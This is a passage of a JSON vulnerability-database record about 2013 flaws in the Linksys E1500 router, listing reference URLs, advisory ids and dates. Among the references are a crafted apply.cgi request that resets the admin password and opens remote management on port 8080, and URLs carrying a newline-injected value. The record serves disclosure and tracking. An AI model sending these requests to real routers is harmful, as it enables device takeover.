"url": "http://\u003cip\u003e/apply.cgi?submit_button=management\u0026change_action=\u0026action=apply\u0026passwdmodify=1\u0026http_enable=1\u0026https_enable=0\u0026ctm404_enable=\u0026remote_mgt_https=0\u0026wait_time=4\u0026need_reboot=0\u0026http_passwd=password1\u0026http_passwdconfirm=password1\u0026_http_enable=1\u0026web_wl_filter=0\u0026remote_management=1\u0026_remote_mgt_https=1\u0026remote_upgrade=0\u0026remote_ip_any=1\u0026http_wanport=8080\u0026nf_alg_sip=0\u0026upnp_enable=1\u0026upnp_config=1\u0026upnp_internet_dis=0"
},
{
"trust": 0.1,
"url": "http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/e1500-os-command-injection-1.0.05-rooted.png"
},
{
"trust": 0.1,
"url": "http://www.pwnd.pwnd%0a"
},
{
"trust": 0.1,
"url": "http://192.168.178.199/wireless_basic.asp"
},
{
"trust": 0.1,
"url": "http://www.s3cur1ty.de/m1adv2013-004"
},
{
"trust": 0.1,
"url": "http://www.pwnd.pwnd%0a\u0026action=apply\u0026submit_type=\u0026change_action=\u0026next_page=\u0026commit=1\u0026wl0_nctrlsb=none\u0026channel_24g=0\u0026nbw_24g=20\u0026wait_time=3\u0026guest_ssid=cisco01589-guest\u0026wsc_security_mode=\u0026wsc_smode=1\u0026net_mode_24g=mixed\u0026ssid_24g=cisco01589\u0026_wl0_nbw=20\u0026_wl0_channel=0\u0026closed_24g=0"
},
{
"trust": 0.1,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?pid=80\u0026app=vw\u0026vw=1\u0026login=1\u0026json=..."
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"db": "CNVD",
"id": "CNVD-2013-00963"
},
{
"db": "PACKETSTORM",
"id": "120079"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-141"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"db": "CNVD",
"id": "CNVD-2013-00963"
},
{
"db": "BID",
"id": "57760"
},
{
"db": "PACKETSTORM",
"id": "120079"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-141"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"date": "2013-02-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00963"
},
{
"date": "2013-02-06T00:00:00",
"db": "BID",
"id": "57760"
},
{
"date": "2013-02-05T23:42:27",
"db": "PACKETSTORM",
"id": "120079"
},
{
"date": "2013-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-141"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"date": "2013-05-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00963"
},
{
"date": "2013-04-02T16:17:00",
"db": "BID",
"id": "57760"
},
{
"date": "2013-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-141"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201302-141"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco Linksys E1500 Router Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "57760"
}
],
"trust": 0.3
}
}